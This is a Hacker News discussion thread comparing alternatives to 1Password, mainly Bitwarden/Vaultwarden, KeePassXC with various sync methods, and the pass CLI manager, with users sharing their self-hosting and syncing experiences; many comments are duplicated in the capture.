Ask HN: Alternatives to 1Password
176 comments
+1 to Bitwarden, and in particular the Vaultwarden implementation.
I've been self hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.
I've been self hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.
Moved from LastPass (premium) to Bitwarden. Could have stayed on the free tier but decided to pay to support them, it’s a fraction of LastPass!
Ditto. I figure I’ll move to vaultwarden if the official implementation ever makes a decision I strongly disagree with.
I would advise to switch the support is so much better and nicer. Plus lighter on the server
I guess VaultWarden may start monetizing at some point if it gets too popular?
I tried this move but I really missed the way LastPass asks you to save a new password created on a new service. On Bitwarden I felt like I had to save the account first before progressing to actually creating the account. LastPass "just knew" and would prompt me after going to the next screen. Has this changed it all since I last tried it a year or so ago?
For me it varies. On some sites Bitwarden prompts to add the new password, but not every site. Still I would say it prompts most of the time, but YMMV.
I looked at self hosting Bitwarden/Vaultwarden, do they require me to have a mail server?
Not a self hosted mailserver. SMTP is sufficient.
Correction: can also be used without any email support.
I use Vaultwarden this way. When I login to the web interface (basically never) I get the following notice because I never verified my account's e-mail address:
> Verify your account's email address to unlock access to all features.
Also I am unable to change my account's e-mail address. That's the only "locked feature" I'm aware of. I also don't know of any other issues from not setting up SMTP.
edit: Oops, I thought you were ohCh6zos asking a clarifying question
> Verify your account's email address to unlock access to all features.
Also I am unable to change my account's e-mail address. That's the only "locked feature" I'm aware of. I also don't know of any other issues from not setting up SMTP.
edit: Oops, I thought you were ohCh6zos asking a clarifying question
This answers my followup question, so thank you!
No. I use vaultwarden without any email at all.
KeePassXC is the way to go. Install F-Droid on your Android smartphone, get KeePassDX. This way, you have a desktop and Android client.
I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.
If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].
[1]: https://www.eff.org/dice
I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.
If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].
[1]: https://www.eff.org/dice
Do you have any recommendations on syncing the database file between devices?
I just keep my KeePass database synced in $generic_cloud_storage. Since the database is encrypted and decrypted on the client side using a password and a key file, and I'm not keeping the key file synced (I copy it manually to my devices), I haven't found it to be an issue to keep the database in cloud storage even though I obviously wouldn't trust the provider with my cleartext passwords.
^^ Just to emphasize:
USE A KEY FILE in addition to a password.
Your paranoid self can sleep well at night (as long as your key file is not being synced).
USE A KEY FILE in addition to a password.
Your paranoid self can sleep well at night (as long as your key file is not being synced).
I do it manually every now and then. As for an automatic approach, you could try KeeShare[1] or Syncthing[2].
[1]: https://keepassxc.org/docs/KeePassXC_UserGuide.html#_databas...
[2]: https://syncthing.net/
[1]: https://keepassxc.org/docs/KeePassXC_UserGuide.html#_databas...
[2]: https://syncthing.net/
Syncthing! Has Windows/Linux/Android/iOS clients. Works perfectly.
I had so many issues with this, it feels like you have to keep track of whret you do changes and when it has synced it. Otherwise it won't merge and you will have to do it manually.
Bitwarden is so much easier sadly.
Bitwarden is so much easier sadly.
Honestly, I think I had syncing conflicts maybe once or twice, and even then the merge feature worked without any hiccup.
Maybe it does help the fact that I have my NAS always online, and I treat my mobile devices mostly as "read-only" - i.e, if I have to create a new password it will almost surely be on my desktop / laptop.
Maybe it does help the fact that I have my NAS always online, and I treat my mobile devices mostly as "read-only" - i.e, if I have to create a new password it will almost surely be on my desktop / laptop.
Keepass2Android and KeePass2 official syncs reasonably well. Or the XC implementation if you prefer
I've been happily using syncthing for 2 years now. Syncs my password files between 3 computers and 2 phones.
There's manual syncing, and automatic syncing.
Manual: All clients I've seen have the capability to merge databases. So you have one copy of the database in whatever online file storage service, plus each device will have its own local copy. Pull down the online db, do a bidirectional sync between the two databases, push back online.
Automatic: some clients natively support webdav, dropbox, etc as the master copy of the db file and will transparently do the change syncing for you.
Manual: All clients I've seen have the capability to merge databases. So you have one copy of the database in whatever online file storage service, plus each device will have its own local copy. Pull down the online db, do a bidirectional sync between the two databases, push back online.
Automatic: some clients natively support webdav, dropbox, etc as the master copy of the db file and will transparently do the change syncing for you.
This guy suggest SyncThing for automated route of syncing databases of password savers.
https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html
https://syncthing.net/
https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html
https://syncthing.net/
Basically any file sync client. Just keep the keepass database in the folder that gets autosync'd and sync the folder to each device you need keepass on
I use rsync on termux and zerotier for remote access. Mounting sshfs on android is also great if you don't need any passwords when offline.
We have the family password database in Google Drive. It works suprisingly well, and it haves file versioning.
I keep my password database in a Google Drive directory. Clients exist on Windows, Mac, Android, IOS.
Keepasswandroid can integrate with any cloud storage and will perform merge when needed
Self-hosted Nextcloud supports WebDAV. It's been working great for me.
Keepass2Android can sync and merge from a variety of file sync services.
I'm currently using KeePassDroid on my smartphone, in case you also tried it could you tell me why you prefer KeePassDX? I've never heard of it before
There's pass, a CLI password manager that's version controlled and encrypted with your PGP key: https://www.passwordstore.org/
There are also (unofficial) iOS and Android clients that sync to a git repo.
There are also (unofficial) iOS and Android clients that sync to a git repo.
It's great, but how can one trust the unofficial clients? They aren't from a well-known developer, and AFAIK, you can't check that the build is from the same code as the GitHub repo.
> same code as the GitHub repo
If you have access to the code then (on Android at least) you could build and install the APK yourself.
If you have access to the code then (on Android at least) you could build and install the APK yourself.
Can back this up, the android client is a little finicky but otherwise love this setup. Made by the same person behind wireguard.
"Password Store" Android app by Harsh Shandilya is actually quite good.
that's the one i have, and for whatever reason, my set up does not allow me to create passwords on the android app. I have struggled with SSH multiple times (i always need to create a new ssh key rather than importing a stronger one), etc.
That said, haven't checked for fixes in a while - the actual functionality of the app itself (when in working condition) is very good.
That said, haven't checked for fixes in a while - the actual functionality of the app itself (when in working condition) is very good.
I had issues creating passwords and syncing them too, until I changed my git repo url to be `ssh://[email protected]/…` and set up an SSH key. Worth a shot.
yeah, the ssh issues i kind of sorted out - it was mostly about generating vs importing ssh keys in my case.
I believe i'm falling foul of this issue with actually encrypting things: https://github.com/android-password-store/Android-Password-S...
I believe i'm falling foul of this issue with actually encrypting things: https://github.com/android-password-store/Android-Password-S...
Pass is the best! As an alternative to the git sync you can also sync via nextcloud or syncthing :-)
I've tried pass 2 different times on 2 different versions of MacOS and both times it ends up eating tons of CPU and battery. I was never able to figure out what was happening so I just uninstalled the whole thing.
pass is just a shell script. it does not consume any resources. maybe you are referring to something else ?
Bitwarden if you want a third-party managing your credentials, keepass if you're ok handling the syncing of your password database.
There is also the reimplementation of Bitwarden's server, vaultwarden. https://github.com/dani-garcia/vaultwarden. It's worth a look if you're self hosting.
+1 for bit/vaultwarden. Nice mobile apps, nice browser plugins, nice web interface. Regular updates, easy to install. Using it for a year + (two years?) no issues. Super grateful.
Bitwarden also works with self-hosted servers.
I would say that I found Bitwarden much better than keepass for selfhosted too.
KeePass' UI is quite clunky, but last time I checked you couldn't even do proper keyboard navigation with Bitwarden, or auto-type outside the browser...
I'm not sure I quite understand your comment.
> Keyboard navigation
I use the `bw` command, and haven't had issues with the keyboard.
> auto-type outside the browser.
Is this mobile or desktop that we are talking about here? Mobile worked correctly for me. Integration for all of these password managers on desktop isn't great, and using the fingerprint to unlock, similar to 1Password, would be nice.
> Keyboard navigation
I use the `bw` command, and haven't had issues with the keyboard.
> auto-type outside the browser.
Is this mobile or desktop that we are talking about here? Mobile worked correctly for me. Integration for all of these password managers on desktop isn't great, and using the fingerprint to unlock, similar to 1Password, would be nice.
I mean the desktop UI, I haven't tried the mobile.
By keyboard navigation I mean basic stuff like using arrow keys, shortcut keys for menus, etc... It all felt very much mouse-centric.
And Auto-type is KeepassXC' global shortcut key to invoke auto-type in any application, even terminal windows. AFAIK most password managers don't even think of supporting this.
By keyboard navigation I mean basic stuff like using arrow keys, shortcut keys for menus, etc... It all felt very much mouse-centric.
And Auto-type is KeepassXC' global shortcut key to invoke auto-type in any application, even terminal windows. AFAIK most password managers don't even think of supporting this.
Bitwarden has a cli app. With this you can automate everything.
Regarding keyboard navigation in the ui. If your are into that just use the cli and create some helpful scripts for rofi, alfred, ueli or whatever you are using if you want to have a ui.
Bitwarden is so insanely good that this minor downside shouldn't keep you from using it.
My mum is really bad with PCs. Yet bitwarden has solved all her password problems. Especially on mobile. With KeepassXC she was just frustrated.
Regarding keyboard navigation in the ui. If your are into that just use the cli and create some helpful scripts for rofi, alfred, ueli or whatever you are using if you want to have a ui.
Bitwarden is so insanely good that this minor downside shouldn't keep you from using it.
My mum is really bad with PCs. Yet bitwarden has solved all her password problems. Especially on mobile. With KeepassXC she was just frustrated.
Are you saying I could for example start an RDP session with autofilled credentials? I just LOVE the Keepass feature CTRL+U with 'URL overrides' to open rdp, ssh, vpn or ftp sessions.
https://keepass.info/help/base/autourl.html
https://keepass.info/help/base/autourl.html
Yes, sure you can do that.
Windows: https://github.com/anonymous1184/bitwarden-autotype
Linux: https://github.com/mattydebie/bitwarden-rofi
OSX: https://github.com/blacs30/bitwarden-alfred-workflow
Windows: https://github.com/anonymous1184/bitwarden-autotype
Linux: https://github.com/mattydebie/bitwarden-rofi
OSX: https://github.com/blacs30/bitwarden-alfred-workflow
You can use a lot of different clients for KeePass. I use KeePassXC and Strongbox (highly recommend for iOS or macOS)
I thought other way around: Bitwarden UI is simplistic.
I think it strongly depends on the ecosystem one is in and the usecase. Android support for keepass is pretty solid with keepass2android.
Are you using the official server or vaultwarden? Do you mind getting more into the experience of it?
This is true, I am using Vaultwarden now rather than actual Bitwarden.
In Docker it took seconds to get running. Hardening it took a little longer, but fail2ban was still only 6 lines of config.
In Docker it took seconds to get running. Hardening it took a little longer, but fail2ban was still only 6 lines of config.
I have to try that, the official server wants to spin up a few containers, a MSSQL and needs 2-4GB RAM and 25GB disk space. lol...
This uses sqlite and I see it using about 30Mb.
MSSQL is never the correct answer.
MSSQL is never the correct answer.
Mssql is good if you need a 1TB+ db and replication and are too lazy to set up postgres replication. And if you can’t afford oracle. ;)
Another +1 for Bitwarden.
I moved away from 1Password after the developers essentially ridiculed their customers in their support forum. I realized that it's a hostile, aggressive and short sighted company. That they are engaging in this racist action against Russians helps assure me that I made the right decision.
Bitwarden has been a drop-in replacement for all intents and purposes.
I moved away from 1Password after the developers essentially ridiculed their customers in their support forum. I realized that it's a hostile, aggressive and short sighted company. That they are engaging in this racist action against Russians helps assure me that I made the right decision.
Bitwarden has been a drop-in replacement for all intents and purposes.
> I moved away from 1Password after the developers essentially ridiculed their customers in their support forum. I realized that it's a hostile, aggressive and short sighted company.
I don’t know about this incident of them being racist, but if I leave that aside, your words sound exactly like what I would say about the company! This isn’t something new with Agile Bits ridiculing customers or potential customers on its forums. There have been instances of this several years ago too when people questioned the licensing model and asked about the changes. They essentially behave as if users are stupid and that they (Agile Bits) are the only ones who know what’s best in every case. It’s quite condescending.
I don’t know about this incident of them being racist, but if I leave that aside, your words sound exactly like what I would say about the company! This isn’t something new with Agile Bits ridiculing customers or potential customers on its forums. There have been instances of this several years ago too when people questioned the licensing model and asked about the changes. They essentially behave as if users are stupid and that they (Agile Bits) are the only ones who know what’s best in every case. It’s quite condescending.
The incident you’re referring to is exactly the incident that made me move on :)
What racist action are you referring to?
For my money it's hollow virtue signaling, not racism, but he's referring to OPs original post, that Agile Bits removed 1Password from the Russian play store.
Could you show me the thread?
I wouldn't use any of the Kaspersky's software, as their owner, Eugene Kaspersky, is literally an ex-KGB officer (if there's such a thing as ex-KGB).
https://en.wikipedia.org/wiki/Eugene_Kaspersky
https://en.wikipedia.org/wiki/Eugene_Kaspersky
Well, it was mostly a joke. But at least the possibility of Kaspersky removing their apps from Russian app stores is quite low.
I’ve been looking at alternatives for a while, here are my notes: https://taoofmac.com/space/apps/1password
(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)
(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)
This was a great write-up and very helpful. Been looking to make the switch over to something like this myself.
People say a lot of nice things abotu Bitwarden, and it's got both self-hosting and hosted options.
TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.
TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.
1Password started and currently has a self-hosted option. They are actively migrating to a SAAS model to justify monthly subscriptions instead of licenses.
There's a new kid in town: https://www.ctrlc.hu/~stef/blog/posts/sphinx.html
pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other peoples servers!
cons: there is no UI frontend for macs, and UI integration in browser could also be improved.
(i'm the author, ama)
pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other peoples servers!
cons: there is no UI frontend for macs, and UI integration in browser could also be improved.
(i'm the author, ama)
So a derived password generator like SQRL and friends?
not sure, by looking at the sqrl wikipedia page it's not immediately obvious how this works. but yeah, "derived password generator" sounds correct, with one important detail. the there is (almost) no state at the client, and there is a mandatory online component where part of the derivation happens.
Is rotation supported? And if the main password is compromised doesn't that compromise all future derived passwords too?
It also means an attacker needs only the main password and knowledge of which derived system one uses. They don't need a vault file as well.
It also means an attacker needs only the main password and knowledge of which derived system one uses. They don't need a vault file as well.
what does rotation mean? you can change your passwords, both the "master" which i rather call input, and the output password as well. i mean you can have a new output password without changing your input password.
and no although i can only guess what you mean with vaultfile, an attacker still needs access to the sphinx server, which has protections against bruteforce attacks.
and no although i can only guess what you mean with vaultfile, an attacker still needs access to the sphinx server, which has protections against bruteforce attacks.
you might want to read the whitepaper regarding bruteforce attacks: https://github.com/stef/pwdsphinx/blob/master/whitepaper.org...
Yeah this isn't a new concept. I personally like Lesspass.
the thing is. sphinx is designed by people with outstanding crypto protocol design credentials, the guys who came up with hmac and hkdf cryptographic primitives. the nice thing about sphinx is that it comes with "information theoretic security" - a very strong guarantee, not sure how the competition stacks up against this though...
Can you use your browser's native password manager? Chrome supports syncing of passwords. Just dump a bunch of gibberish into the password field when you register and let the browser do the rest.
IDK if this is still the case, but I remember a few years ago it was shown that Chrome was just storing your passwords in plain text on your machine.
Firefox has a way to set a primary password, however IIRC there are some major issues with it. However, it is worth considering what you are trying to protect against and for most single user systems I'm not convinced it is worth using something other than the built in browser password manager (unless you have a number of other applications that require passwords and don't have an easy way to store them). Encrypting paritions with sensitive data is a better way to protect data when the system is off. Unless you clear cookies all the time there is quite a bit that can be done just with cookies, although protecting passwords should at least prevent loosing access to accounts. In some cases a password manager can help with the possibilty of a computer being stolen while on. Uploading unencrypted files right away is easier if someone gains remote access but, while depending some on the specific OS and password manager, it is usually not too difficult to start reading passwords as they are used and intercepting the primary password of the password manager the next time it is used might not be all that hard either.
There's nothing wrong with storing passwords in plaintext on the machine.
One vulnerability in your browser allowing file system access and now all your passwords are known to the hacker.
You run the wrong executable and there go all your passwords again, being uploaded to who knows where. But you 100% trust the authors of all the software you run and you know they would never be vulnerable to a sole chain attack a la SolarWind.
Don't keep passwords you can't afford to be public in plain text in a predictable location on the file system.
You run the wrong executable and there go all your passwords again, being uploaded to who knows where. But you 100% trust the authors of all the software you run and you know they would never be vulnerable to a sole chain attack a la SolarWind.
Don't keep passwords you can't afford to be public in plain text in a predictable location on the file system.
In every single case you've described the attacker can:
a) Already ready your passwords from memory/ webpages/ any other of the million ways
b) Access your cookies and session tokens
If the attacker is in a position to read the plaintext file off of the disk it really won't matter if it's encrypted. You're welcome to do so, I'm sure there are extremely niche scenarios where it may help, but it's not really worth mentioning imo.
a) Already ready your passwords from memory/ webpages/ any other of the million ways
b) Access your cookies and session tokens
If the attacker is in a position to read the plaintext file off of the disk it really won't matter if it's encrypted. You're welcome to do so, I'm sure there are extremely niche scenarios where it may help, but it's not really worth mentioning imo.
Not all of your passwords will be in memory. I don't know how you read a password from "webpages".
Session tokens do not exist for websites you are not currently accessing. The password file will contain all the saved passwords, whether you are logged in or not.
Session tokens do not exist for websites you are not currently accessing. The password file will contain all the saved passwords, whether you are logged in or not.
> Not all of your passwords will be in memory.
They almost certainly will be, but the key will be if they aren't.
> I don't know how you read a password from "webpages".
Like a billion ways. Inject JS, log keys, install malicious extension, blah blah blah
> Session tokens do not exist for websites you are not currently accessing.
I'm just enumerating the billion ways that encryption is made pointless.
> he password file will contain all the saved passwords, whether you are logged in or not.
And the attacker can just access it lol
Maybe in a world where full disk encryption wasn't ubiquitous you could talk about an offline attack, and you could tell me you share your computer with someone who's not tech savvy but is an asshole. But it's all gonna be pretty niche.
They almost certainly will be, but the key will be if they aren't.
> I don't know how you read a password from "webpages".
Like a billion ways. Inject JS, log keys, install malicious extension, blah blah blah
> Session tokens do not exist for websites you are not currently accessing.
I'm just enumerating the billion ways that encryption is made pointless.
> he password file will contain all the saved passwords, whether you are logged in or not.
And the attacker can just access it lol
Maybe in a world where full disk encryption wasn't ubiquitous you could talk about an offline attack, and you could tell me you share your computer with someone who's not tech savvy but is an asshole. But it's all gonna be pretty niche.
> I don't know how you read a password from "webpages"
When you enter your password to login.
When you enter your password to login.
Last year, CtrlBlog reviewed these password savers and found KeePassXC to be usable for a self-hosted password saver server and widest-platform client usages.
- Windows
- KeePassXC Offline for Android
- iOS
- Linux
- Windows
- KeePassXC Offline for Android
- iOS
- Linux
I don’t need to use KeePass, though. There are over a dozen different forks of the KeePass project to choose from. I decided on KeePassXC for my Mac, Linux, and Windows computers; and KeePass2Android Offline for my Android phone. I decided on these two because they feel more modern and I’ve confirmed that they won’t easily suffer from synchronization conflicts.
https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html+1 for Keepass, and on iphone imho by far the best client is Keepassium. Sometimes I think that it's the most craftsmanlike software which I ever use on any platform; it's really well designed and implemented. It basically assumes that you'll keep your password file in Dropbox or similar.
Nit: technically not a server. They're recommending a local file solution and SyncThing to keep copies aligned.
Moved to Bitwarden + Vaultwarden. It's pretty good! Firefox plugin doesn't work in private browsing. Browser plugins don't auto-sync. Other than that, I was pretty happy to ditch 1password as Agile Bits circles the drain.
The UI doesn't work in private browsing but you can autofill through the right click menu assuming the vault is unlocked already. Though sometimes it's a bit flaky and takes three attempts before it works.
Also curious what issues you've had with syncing, mine definitely sync at points and only occasionally require me to do a manual sync. Usually it's only an issue if I just added an entry on another device and want to immediately use it on another.
Also curious what issues you've had with syncing, mine definitely sync at points and only occasionally require me to do a manual sync. Usually it's only an issue if I just added an entry on another device and want to immediately use it on another.
Ah, interesting, I've actually never waited to see if it syncs eventually or not. I am slow rolling my move from 1Password, about 70% moved over. Every time I go to login somewhere and there's no Bitwarden entry, I copy that login over by hand and then delete from 1P. So my use case so far has always been immediate sync which I have to trigger by hand (a lot of clicks to get there too).
As there are many (and good) answers here, I may have missed one point - which I will raise: Check the fallback / fail scenario(s).
Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.
Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.
The owners sugarcoated this in every way (pet peeve: Talking in their mails about something completly different like recipes, then "by the way, subscription only in 3,2,1 ...").
I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And you should not, too. Same goes for any company.
So any of the suggested tools here should do two things: Work independent on an online/sync-connection (and be able to access/modify data untill online connection has been reestablished). And be able to export data in a format that can be transformed/read by most of the others.
I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.
Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.
Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.
The owners sugarcoated this in every way (pet peeve: Talking in their mails about something completly different like recipes, then "by the way, subscription only in 3,2,1 ...").
I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And you should not, too. Same goes for any company.
So any of the suggested tools here should do two things: Work independent on an online/sync-connection (and be able to access/modify data untill online connection has been reestablished). And be able to export data in a format that can be transformed/read by most of the others.
I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.
For enterprise setups I use vaultwarden (a rust based open source bitwarden).
Can do password sharing and so on
For personal use keepassxc and syncthing. Keepassdx on android.
Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting
For personal use keepassxc and syncthing. Keepassdx on android.
Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting
I made my own.
After trying for a test period the usual famous ones, and not being happy with anything (cloud crap, no memory encrypt, no clipboard cleaning - to just name a few) I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At beginning nothing fancy, just a SQLite DB and simply focus on name field, system-wide shortcut for my manager to pop-up and then selecting the entry. Manager would type in the username, TAB to password field, then type the password there as well and press ENTER. That was the most rudimentary one and whenever some new web/app was not working I would see why and increase from there its code/logic.
After like 3 months I was happy with all I had the need for and very rarely, something like every 6 months, I would touch its code for maximum 2 days to make it work. It's being over 5 years at this point and use it daily on my several dozens web sites / desktop apps I need. During this time I never did a full refactoring or change its underlying business logic.
So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.
After trying for a test period the usual famous ones, and not being happy with anything (cloud crap, no memory encrypt, no clipboard cleaning - to just name a few) I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At beginning nothing fancy, just a SQLite DB and simply focus on name field, system-wide shortcut for my manager to pop-up and then selecting the entry. Manager would type in the username, TAB to password field, then type the password there as well and press ENTER. That was the most rudimentary one and whenever some new web/app was not working I would see why and increase from there its code/logic.
After like 3 months I was happy with all I had the need for and very rarely, something like every 6 months, I would touch its code for maximum 2 days to make it work. It's being over 5 years at this point and use it daily on my several dozens web sites / desktop apps I need. During this time I never did a full refactoring or change its underlying business logic.
So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.
Apple’s password management is getting better and now includes 2FA. I wouldn’t be surprised to see it spun out as a separate app sometime soon.
I'm currently moving to it, but may be I miss something, but it's absolutely primitive.
Is it possible to store anything but website/username/password there? I can shoehorn my ssh password like "ssh 1.2.3.4"/"username"/"password" into that scheme, but it's ugly.
Is it possible to store bank card PIN code? I'm storing it as fake website right now which is far from ideal.
I need to access all the necessary information from iPhone.
Is it possible to store anything but website/username/password there? I can shoehorn my ssh password like "ssh 1.2.3.4"/"username"/"password" into that scheme, but it's ugly.
Is it possible to store bank card PIN code? I'm storing it as fake website right now which is far from ideal.
I need to access all the necessary information from iPhone.
It also doesn't keep history. I consider that an important feature; it has saved me some grief now and then when a password change at $JOB mysteriously didn't propagate to some infrequently-used system.
On Mac you can open the Keychain Access app and add whatever secrets or encrypted notes you want, in the local keychain or the iCloud Keychain.
Use https://www.lesspass.com/#/ - I've found the approach very fresh. Of course, you have to be sure that master password is not leaked, but the same is true for any stateful password manager.
The real problem though is that it does not support hardware security tokens at the moment.
The real problem though is that it does not support hardware security tokens at the moment.
I've looked into this approach in the past. For me it really breaks down if any of your sites require you to ever change or rotate your password. Then you have to memorize or record the differences.
> Of course, you have to be sure that master password is not leaked, but the same is true for any stateful password manager.
I don’t think this comparison is accurate. With a vault-based password manager, an attacker would need the master password AND the vault. The vault is usually protected separately, either because it’s a file that’s non-public (e.g. Keepass), or because it’s a web service that’s rate-limited or otherwise monitored (e.g. 1Password Cloud).
I don’t think this comparison is accurate. With a vault-based password manager, an attacker would need the master password AND the vault. The vault is usually protected separately, either because it’s a file that’s non-public (e.g. Keepass), or because it’s a web service that’s rate-limited or otherwise monitored (e.g. 1Password Cloud).
The vault is almost always protected by the master password. That single password is what's used both to retrieve the vault and to decrypt it.
The only difference is going to be if the remote vault requires a separate auth factor. And that's a legitimate thing to consider. But I think (but I haven't thought much about it tbh) if you have a secure master password then the situations where this matters are limited.
The only difference is going to be if the remote vault requires a separate auth factor. And that's a legitimate thing to consider. But I think (but I haven't thought much about it tbh) if you have a secure master password then the situations where this matters are limited.
> That single password is what's used both to retrieve the vault and to decrypt it.
Not sure how you mean that: if I used Keepass for example, which uses a file vault, and I told you that my master password was `p4ssw0rd`, how would that give you access to my vault and hence to any of my passwords?
Not sure how you mean that: if I used Keepass for example, which uses a file vault, and I told you that my master password was `p4ssw0rd`, how would that give you access to my vault and hence to any of my passwords?
Sorry, I had assumed you were referring to systems where the vault is distributed.
Ah nice, I had this idea and was thinking of implementing it. This is probably a very scary idea for a lot of people, but the reality is that it's no different with regards to security than other approaches, but it's vastly simpler (which should be a win).
I can't speak to this specific implementation, but the reality is that if your master password is leaked you have to rotate every credential no matter what.
I can't speak to this specific implementation, but the reality is that if your master password is leaked you have to rotate every credential no matter what.
This has been implemented many times over the last 20 years. Another implementation is PasswordMaker.
It breaks as soon as domain names change.
Passbolt is open source and can be self hosted if you don't want (or can) run their cloud version.
https://www.passbolt.com/
It's gully open source, with a AGPL license.
https://github.com/passbolt/
https://www.passbolt.com/
It's gully open source, with a AGPL license.
https://github.com/passbolt/
I’ve been using CodeBook for several years and have been pretty happy with it. One time cost (per OS) and can sync over WiFi or to Dropbox/google drive. No browser plugins, instead it provides a global hot key activation which authenticates you (Touch ID or password), lets you search for the account then auto-types the password. On iPhone it integrates well for providing passwords to sites and they just recently added a feature which will also auto-copy 2FA TOTP into clipboard if one exists.
https://www.zetetic.net/codebook/
https://www.zetetic.net/codebook/
I use gopass and Gopass Bridge for password filling in firefox. It works great, and for the keys I'm using yubikeys gpg mode, so my passwords are actually locked with a hardware key.
I've been using pass with passff to do the same for a few years. Works well. Any idea how gopass and gopass bridge compare?
I am tempted to try gopass, but if pass is good enough for Jason Donenfeld it's good enough for me!
I am tempted to try gopass, but if pass is good enough for Jason Donenfeld it's good enough for me!
Not sure, I went straight to gopass. IIRC the CLI for gopass is slightly easier to integrate with other applications than pass, but that's just based on what I heard.
I’ve been using an app called Secrets for iOS and macOS for close to a year. A one time purchase, easy syncing, and other items like secure notes and software licenses can be stored. They also have import from 1Password. Excellent experience so far, almost a complete 1:1 analog of 1Password. Command + \ to auto-populate fields works, maybe not as smoothly. For the money Secrets charges I’m satisfied knowing that after a year, I’m saving.
Personally I'm not sure that low price is a decision factor for secrets management. :)
I'm willing to pay good money for a good product in this area. (I've said elsewhere I'd probably even be happy to pay 1P subscription if they didn't also do everything they could to prevent me using anything but their cloud.)
I'm willing to pay good money for a good product in this area. (I've said elsewhere I'd probably even be happy to pay 1P subscription if they didn't also do everything they could to prevent me using anything but their cloud.)
KeePass is open source and has many 3rd parties clients.
https://keepass.info/download.html
It supports having a key file on top of password.
It has plugins to import from 1password too:
https://keepass.info/plugins.html
https://keepass.info/download.html
It supports having a key file on top of password.
It has plugins to import from 1password too:
https://keepass.info/plugins.html
Does anyone have an opinion on Enpass' trustworthiness? It's pretty sleek, and with wifi sync I don't even need a server/cloud provider... But being a commercial application I'm not sure how to weigh its security. It also seems the last public audit is from 2018.
I have been using it for years and have been very happy with it. Never seen anything sketchy in the software itself or their support forums. Just the fact that it’s not linked to a cloud puts its trustworthiness higher than a lot of others in my books.
I've used it for several years before moving onto Bitwarden. While the UX on Enpass was better, I am hoping for Bitwarden to implement a couple of features and optimistic about it. What pulled me towards Bitwarden is the low cost, the huge community behind it and knowing my data is always gonna be super safe.
Shameless plug, and I don't sell them anymore (but you can build your own): https://finalkey.net/ is a hardware dongle that stores passwords on-device, rather than on some server online.
This impulse to block the Russian people from using western products is really gross, IMO. What have the Russian people done to anyone? Governments are to blame for the horrors going on in Ukraine. Not some oppressed citizen who has no say in the matter.
I love my setup, (It's not Free).
KeePass with the database file hosted on Dropbox
on my Macbook I use Strongbox on my iPhone also use Strongbox
Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers
KeePass with the database file hosted on Dropbox
on my Macbook I use Strongbox on my iPhone also use Strongbox
Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers
I used KeePass/KeePassXC/KeePassium with iCloud Drive. This setup works, but it's cumbersome to sync. I'm migrating to iCloud Passwords right now.
I'm wondering what HN thoughts are for SafeInCloud? I don't sync passwords ever, but I'm curious as to the feedback from the HN community in general.
Pass and Keepassxc. I don’t trust online websites.
I've been using BitWarden. It is perfect.
Log into another country’s app store? Is this no longer possible? Not that I would ever support using 1Password though.
Keepass is what I use now. It has variants for windows, macOS, Linux, iOS, and probably Android but I haven’t seen it.
Did you try the Aurora store, which is independent of the "location" based Google account/store?
How secure is 1Password? I have been using it for 4 months. Should I switch to Bitwarden?
1Password isn't insecure afaik. The problem most people have with them is that a hedge fund bought them and immediately started rent seeking.
They decided to go fully SaaS, and drop the ability to sync via Dropbox or local password database.
I'm still running 1P 7, testing out some other solutions to see where to go in the future. I was happy to pay for the new versions every year or two, but going hosted means they've lost many customers like me who would rather keep the password database local.
I'm still running 1P 7, testing out some other solutions to see where to go in the future. I was happy to pay for the new versions every year or two, but going hosted means they've lost many customers like me who would rather keep the password database local.
The problem with 1Password is its poorly managed feature complexity and things shuffling around paywalls. Throw in frequent changes to pricing and that talked me out of using it.
I'm afraid there is nothing public we can trust in today's world. We see how big companies are just throwing away their users and data. So, watch to pass (CLI password manager) or KeePassXC as they sync nothing but store local, which means they can't beat you.
Forefox Sync works for me.
I use bitwarden.
- Open Source
- Great apps
- Great chrome & firefox addon
- Open Source
- Great apps
- Great chrome & firefox addon
Passbolt
My leading contender is KeePassXC.
https://keepassxc.org
Short addition: Keepass just stores everything in one encrypted .kdbx file. You can then sync that file to your other devices (phone, other computer etc) using your cloud, nextcloud or if you don't trust any of that using a local filesync solution like Syncthing.
I have explored syncing of these Keepass files with Nextcloud and Syncthing and both just works fine and I can recommend it.
I have explored syncing of these Keepass files with Nextcloud and Syncthing and both just works fine and I can recommend it.
